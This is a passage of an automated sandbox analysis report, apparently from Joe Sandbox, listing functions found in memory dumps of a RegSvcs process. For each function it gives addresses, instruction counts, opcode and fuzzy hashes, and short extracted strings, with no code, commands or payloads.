Opcode ID: ea21cffedb02d0b3eeaf1c581f7fad56db0f2658ea70b6f518048839210f25c8
Instruction ID: 93d1e1743cb9f73658eac6f304e88fc885569383c79e29be8e6b4d144fd19579
Opcode Fuzzy Hash: ea21cffedb02d0b3eeaf1c581f7fad56db0f2658ea70b6f518048839210f25c8
Instruction Fuzzy Hash: E4E046B8900204CBEB009F98E808B5CB7B1EB88305F11C058D119971A4C378DE88CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00A74B30 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107cdc477bf78403dd81207a0d9c151efa60f5aff05713a5946523d3019f3161
Instruction ID: b322ffb2396035f7494a30a02fbb382c355d7170b249f12daee0089916d2108e
Opcode Fuzzy Hash: 107cdc477bf78403dd81207a0d9c151efa60f5aff05713a5946523d3019f3161
Instruction Fuzzy Hash: 60D0A734D08608DFD700BBF8CC066AABBF59748B02F50C534D50B5B304EF706844A5A3

Uniqueness

Uniqueness Score: -1.00%

Function 06704CEF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929c7c278d34a170d3df742bc6247be5cf173173ba5a981e5ce1e7616e83ff15
Instruction ID: c9bebe346c4cd2ac3da3a6f224f1c2a2eb59114303a6f7b15e0c61e065c7346a
Opcode Fuzzy Hash: 929c7c278d34a170d3df742bc6247be5cf173173ba5a981e5ce1e7616e83ff15
Instruction Fuzzy Hash: F0D0A770BC4341BFE3661AB0892676E3BD39B82960F15046DD2638F3C9DD544C02C765

Uniqueness

Uniqueness Score: -1.00%

Function 00A74DF0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac50fc8d046d0f9a1ff98133a104b10bbc1480aa3e4656fafaf98f39e23f53bd
Instruction ID: 50dce16e0e87250dce6a7301ef3bff12ef61f4ba6ab2d0793f0533ee79e77c1d
Opcode Fuzzy Hash: ac50fc8d046d0f9a1ff98133a104b10bbc1480aa3e4656fafaf98f39e23f53bd
Instruction Fuzzy Hash: 5EE0C2B8A05300EFE308DB60E85AB6577A2FB89709F34801CE5425A3C3D7B15D02DB01

Uniqueness

Uniqueness Score: -1.00%

Function 067033F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26f6676c1a4ae28d346f80588eb8fb220bb46c65b438c04f6759368818bfc3a6
Instruction ID: 1e937fc577721741c25cf98bb26804c36c197241c882be07a9af520c79037f58
Opcode Fuzzy Hash: 26f6676c1a4ae28d346f80588eb8fb220bb46c65b438c04f6759368818bfc3a6
Instruction Fuzzy Hash: 0AD0C730B402408FEB648FA0D42476837E3AB88B10F20C854AA069B388CB795D42CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00A71CB7 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a10658695a9e953ddc8bee334beb8f4d0b6a64731ac1dcc1b74376a450302d64
Instruction ID: e8a9fd2a7c58b9395ebce113d67d4f06462b3480942eef29bf7d7893098c908e
Opcode Fuzzy Hash: a10658695a9e953ddc8bee334beb8f4d0b6a64731ac1dcc1b74376a450302d64
Instruction Fuzzy Hash: 0DD0C77194510CAE8B15DFF899418DE7BF59F45300B1047FED409D7611E9714A149B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A71CB8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e519345ec9b012bfc395e87fc0822261c4a33122d616da9b245b991f638256ef
Instruction ID: 549fe30ddeff5b735a5886cd57e554423cbfdefb3e4c6497ced0ba6bd0b226ea
Opcode Fuzzy Hash: e519345ec9b012bfc395e87fc0822261c4a33122d616da9b245b991f638256ef
Instruction Fuzzy Hash: AED0C97194110CAF8B04DFE89A018DEBBEDDB49200B5086FA9508D7211FD325A1097D1

Uniqueness

Uniqueness Score: -1.00%

Function 068A6340 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bca63931b5bf0adde1ee8df195e553df1f3245bb20d22b6bba6029b4999f081
Instruction ID: 4565025f28fc256174af24ade86436c76d028fc1cae6a8f12a4bec0419c52476
Opcode Fuzzy Hash: 9bca63931b5bf0adde1ee8df195e553df1f3245bb20d22b6bba6029b4999f081
Instruction Fuzzy Hash: CAD09E314147099AC700FBA8D851855F7B8EFD5210B14C65EE84D5B222EB71E691D681

Uniqueness

Uniqueness Score: -1.00%

Function 00A75020 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9e70e112c78e3611e2befc3e86731e6a4d30c05f1c31a8a14654038e5178c6
Instruction ID: 0c9f5eeaeaa8ba0c5f1b39dec1a12c4b8e19410004183955c92344f46f151c7c
Opcode Fuzzy Hash: 2e9e70e112c78e3611e2befc3e86731e6a4d30c05f1c31a8a14654038e5178c6
Instruction Fuzzy Hash: 7BD09E386413559BE315DBA4D5067393677EB44705F104424D50557785C67A5C43DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A70C4B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1141f07ded4db1ede8ad64e3fe6ccab5ab7d4125f10f9298188c1b1830205cf
Instruction ID: c081fa3f635c6b7f0e9ea09ab4290ee6b8f433b3e61d5d3e5a18126fd074cf87
Opcode Fuzzy Hash: e1141f07ded4db1ede8ad64e3fe6ccab5ab7d4125f10f9298188c1b1830205cf
Instruction Fuzzy Hash: 42C080355045C0DFC70696B8ED1C6753F717B45301F54C535DE0595171DF701516726B

Uniqueness

Uniqueness Score: -1.00%

Function 00A70C50 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 662c9499a75d4d8968a37e8f15af443b50bcc4d973846ae9fc51a648561a355a
Instruction ID: e27e8f8890b95352f64b2fdc2415a56003122d47359ec71e080460334421b98e
Opcode Fuzzy Hash: 662c9499a75d4d8968a37e8f15af443b50bcc4d973846ae9fc51a648561a355a
Instruction Fuzzy Hash: 88C08C31804A88EBC600A2B8CC1CA2A7B78A745301F00C830DA0652260AF606902619B

Uniqueness

Uniqueness Score: -1.00%

Function 00A71E30 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178ca4f5ed303a108415403d2a56211cfefc8e05268e997cd3e4640d23317cd3
Instruction ID: ede007d80a40a3a940169f6a7defbe4303d8a2763c479d96b4b3356f8db7fa6c
Opcode Fuzzy Hash: 178ca4f5ed303a108415403d2a56211cfefc8e05268e997cd3e4640d23317cd3
Instruction Fuzzy Hash: 32C08C2204F2840FC70273B8296A0983B148825200340C4F2F08C4F423D8000842CB82

Uniqueness

Uniqueness Score: -1.00%

Function 068A3B67 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1d9eb2d4b5b27d1b425c997b292764f5619270587b9f5ac1557b6487ec3fa1
Instruction ID: 6fc4ef80c6492e38204d947abf86d407ae0812606c3f179bf32476e74aeb1d7c
Opcode Fuzzy Hash: 2e1d9eb2d4b5b27d1b425c997b292764f5619270587b9f5ac1557b6487ec3fa1
Instruction Fuzzy Hash: 79C0CA30C14608CFEB04CA90C0406AEB772BB98308F448A24C816A2200C3B428008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 067941B6 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0263cae5a2631af5c068f293761467d8ec5fb52d1b441ad7f7f5d8af533993d3
Instruction ID: 1cabf54e04420defedab44810fed552b7466116f9aca424113e816face80645e
Opcode Fuzzy Hash: 0263cae5a2631af5c068f293761467d8ec5fb52d1b441ad7f7f5d8af533993d3
Instruction Fuzzy Hash: 0EC092B4A4611A8FEB50DF28D6083BC7BF1FB54350F00889AD249D3240EB7E2E438B60

Uniqueness

Uniqueness Score: -1.00%

Function 06770DB3 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf8223f31447a840d176cc3a06e24754e73e69d90dbd707b5981599a109b83a
Instruction ID: 8dd815886ef38fd8d72e0ff58bb2512cf1226b182e33b4daf6dc2ceb958b9956
Opcode Fuzzy Hash: 0bf8223f31447a840d176cc3a06e24754e73e69d90dbd707b5981599a109b83a
Instruction Fuzzy Hash: 63B01279201007CBE30CAE04D148B143723B704230F214A11C00AC2600D728EA32C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7995C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb0d95ad2f5588752d67e9e5dc04c23ad404b8bf5d5c26ff0c2faffa274fa6b
Instruction ID: 661b53b8f32b823fde660132f9d37af506c11818fcef7a29ccc111b9492afa55
Opcode Fuzzy Hash: 1cb0d95ad2f5588752d67e9e5dc04c23ad404b8bf5d5c26ff0c2faffa274fa6b
Instruction Fuzzy Hash: 08B012302040004BA285F60CC840418B7619FC4204314C0ACA449CB315CF33ED03C744

Uniqueness

Uniqueness Score: -1.00%

Function 00A7853E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198afc99e6253e469ec2c4740da243f8013dcfb677a4a28a7d0aae49d8f74b17
Instruction ID: 10d32368fa1ada8ea593ab07bc965385d83aa73b7e26fc14731ebf02fedace5c
Opcode Fuzzy Hash: 198afc99e6253e469ec2c4740da243f8013dcfb677a4a28a7d0aae49d8f74b17
Instruction Fuzzy Hash: 8EB002746050115B8645EA58D551414B7519FC5215714C5BD6419CB255CF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 00A71CF0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 00A71C20 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 00A75E70 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 068A1BD5 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5137d3fdc4c6504c788b9908cadf660bb4c28327a3f84c76be7bd7d2d6b9c6f3
Instruction ID: 372a6e0777eb4dbdab8f8c8dc1a263cf76434c939d5a947049ae4cfbc93d204b
Opcode Fuzzy Hash: 5137d3fdc4c6504c788b9908cadf660bb4c28327a3f84c76be7bd7d2d6b9c6f3
Instruction Fuzzy Hash: D4B09234E48148CFEB088B90D8488EDFB33FB48200F008100D8127221087342C05CEB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A786CC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac70dcbb9f328026e4111eac1e9604b0ad317bc4d8d5e96e174eb8692f43524e
Instruction ID: 20d836f90758710628ce5453382e5919c3cc1dd4d2be8b2d34f54ba4d9a120be
Opcode Fuzzy Hash: ac70dcbb9f328026e4111eac1e9604b0ad317bc4d8d5e96e174eb8692f43524e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A712B4 Relevance: 5.3, Strings: 4, Instructions: 313COMMON

Download Yara Rule

Strings

xb`q, xrefs: 00A71316
TJbq, xrefs: 00A716BC
TJbq, xrefs: 00A71335
Te]q, xrefs: 00A7169B

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: TJbq$TJbq$Te]q$xb`q
API String ID: 0-3018173371
Opcode ID: ac0d5bf77268875b43c13c0c9a35c2c1daad972a0ec0acff12a55760418ed72a
Instruction ID: 0332a339ea5ea0e7f3be0f0e5fb026f1e39e29490a235227769be6885ef39062
Opcode Fuzzy Hash: ac0d5bf77268875b43c13c0c9a35c2c1daad972a0ec0acff12a55760418ed72a
Instruction Fuzzy Hash: F3C14671B006199FDB18DF69C994BA9BBF2BF88304F14C1A8E449EB361DA30ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 067A78AF Relevance: 9.0, Strings: 7, Instructions: 263COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A790D
$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382
$]q, xrefs: 067A78F7

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3219822496
Opcode ID: cade9cf6bcfd2eafc6d2fc453673426261b13a4670c29460a5002ec9d142af15
Instruction ID: 1f4c17a04af7187d3223f9d482a5a2e55d4f087f3cf1d5bdd4a64c61b1069c05
Opcode Fuzzy Hash: cade9cf6bcfd2eafc6d2fc453673426261b13a4670c29460a5002ec9d142af15
Instruction Fuzzy Hash: 0BC15D34E04318CFEBA8CF64C955BADB7B2FB84301F5486A5E449AB295C7349E81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 067A7566 Relevance: 9.0, Strings: 7, Instructions: 251COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7575
$]q, xrefs: 067A758B
$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3219822496
Opcode ID: 06bdb06885d1dc715c221c8855d4ff0e7a7d768a3cf1e80c3c1666cef8f0c993
Instruction ID: fc157e8a998d5395197e84c840a5ba73cc1017a8150282d191a5aed76af82b15
Opcode Fuzzy Hash: 06bdb06885d1dc715c221c8855d4ff0e7a7d768a3cf1e80c3c1666cef8f0c993
Instruction Fuzzy Hash: DCB13E34E04318CFEBA8CF68C955BBDB7B2BB84301F508696E409AB291D7349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067A8B8E Relevance: 6.6, Strings: 5, Instructions: 323COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A8C43
TXr, xrefs: 067A8C0B
$]q, xrefs: 067A8E34
$]q, xrefs: 067A8E1E
$]q, xrefs: 067A8D52

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: TXr$$]q$$]q$$]q$$]q
API String ID: 0-4271915648
Opcode ID: e5d0c485b3f0a4303f04e773b2826f525404d2851db853e040dac721d2a1f1c2
Instruction ID: 6b261d7593b0630fdad56820ac5f92476c72f8a5508417db78de6d67e3033032
Opcode Fuzzy Hash: e5d0c485b3f0a4303f04e773b2826f525404d2851db853e040dac721d2a1f1c2
Instruction Fuzzy Hash: 21E14E70E40229CFDBA4DF68C945BAEB7B2FB84700F108599D51AAB784DB349D81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 067A7BD0 Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: 0052b21a1fcd922778ec56567c7f666d1f1151410ab21d0e32789e1b029331e3
Instruction ID: ab3d47325b530e4cd7485c724163bd0d3f7e3f2f33f6ead3f3220c0652cb7f92
Opcode Fuzzy Hash: 0052b21a1fcd922778ec56567c7f666d1f1151410ab21d0e32789e1b029331e3
Instruction Fuzzy Hash: 02B15C34E04318CFDBA8CF68D941BADB7B2FB85301F5486A5E449AB291D7349E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 067A7B74 Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: 95d335a8672d4017248d52a825f87ebabc845b90f1b589295d535a3e2847a9c0
Instruction ID: b709245eed639f125e85d652a6df45e783a1ee3c20a19696d516ebf028a64d01
Opcode Fuzzy Hash: 95d335a8672d4017248d52a825f87ebabc845b90f1b589295d535a3e2847a9c0
Instruction Fuzzy Hash: 2EA13C34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291D7349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067A7C1D Relevance: 6.5, Strings: 5, Instructions: 229COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: 5c00f4a17bdca4156133f43864715059d812450a272a821582ce6cd8190c9ccd
Instruction ID: e1caa2a34fe25eab996983b4aafc024f04b52e98d7ab79ee349c7dee1700fa49
Opcode Fuzzy Hash: 5c00f4a17bdca4156133f43864715059d812450a272a821582ce6cd8190c9ccd
Instruction Fuzzy Hash: 08A14D34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291C7349E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 067A7BFF Relevance: 6.5, Strings: 5, Instructions: 229COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: a7d348d028b8dafd0155a73ecebdd7cc1468d2322c6896b967676220e4585bac
Instruction ID: 1dceb524e9bcc4816accac61451801007d8d4e32ffebd3ab6da976a2baa71268
Opcode Fuzzy Hash: a7d348d028b8dafd0155a73ecebdd7cc1468d2322c6896b967676220e4585bac
Instruction Fuzzy Hash: 9AA14D34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291D7349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067A7B36 Relevance: 6.5, Strings: 5, Instructions: 226COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: c5737a329a631f89016feb1191f3b180ed4c6691b8576ce74aeda80636872dcf
Instruction ID: 3216c5ccfe8706c42ee5adf05fe94deaf7f2f359a6e1708ee7fc2195e205a3a9
Opcode Fuzzy Hash: c5737a329a631f89016feb1191f3b180ed4c6691b8576ce74aeda80636872dcf
Instruction Fuzzy Hash: 7CA13A34E04318CFDBA8CF68C951BBDB7B2BB85301F5486A6E449AB291D7349E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 067A70FD Relevance: 6.5, Strings: 5, Instructions: 215COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7353
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA
$]q, xrefs: 067A7382

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: 05a83443b7f0bb339aa226e7f5c23a5a816720e6612f11133c07a691aab809d7
Instruction ID: 9792f1794c460eda9ed88c4c4b8ce3922f8217de54b4459562c897fe991d271d
Opcode Fuzzy Hash: 05a83443b7f0bb339aa226e7f5c23a5a816720e6612f11133c07a691aab809d7
Instruction Fuzzy Hash: 01A13C34E04318CFEBA8CF68C945BADB7B2FB85301F5486A5E409AB291D7349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067062A0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

fbq, xrefs: 06707918
fbq, xrefs: 067077D2
fbq, xrefs: 06707733
fbq, xrefs: 067064A0

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: fbq$ fbq$ fbq$ fbq
API String ID: 0-4288062871
Opcode ID: fe18b08ae14de259a763c050407ad20cfceace07eb745b78fb36892891407030
Instruction ID: d65c494de081eed1031ad7ee670bbc13d708c2ee67db7e5a47ca63eeed15f33c
Opcode Fuzzy Hash: fe18b08ae14de259a763c050407ad20cfceace07eb745b78fb36892891407030
Instruction Fuzzy Hash: C2716D70A40218DFFBA49F68C961BE976F2FB45710F1084A9D409AB3C5C7749E81CFA1

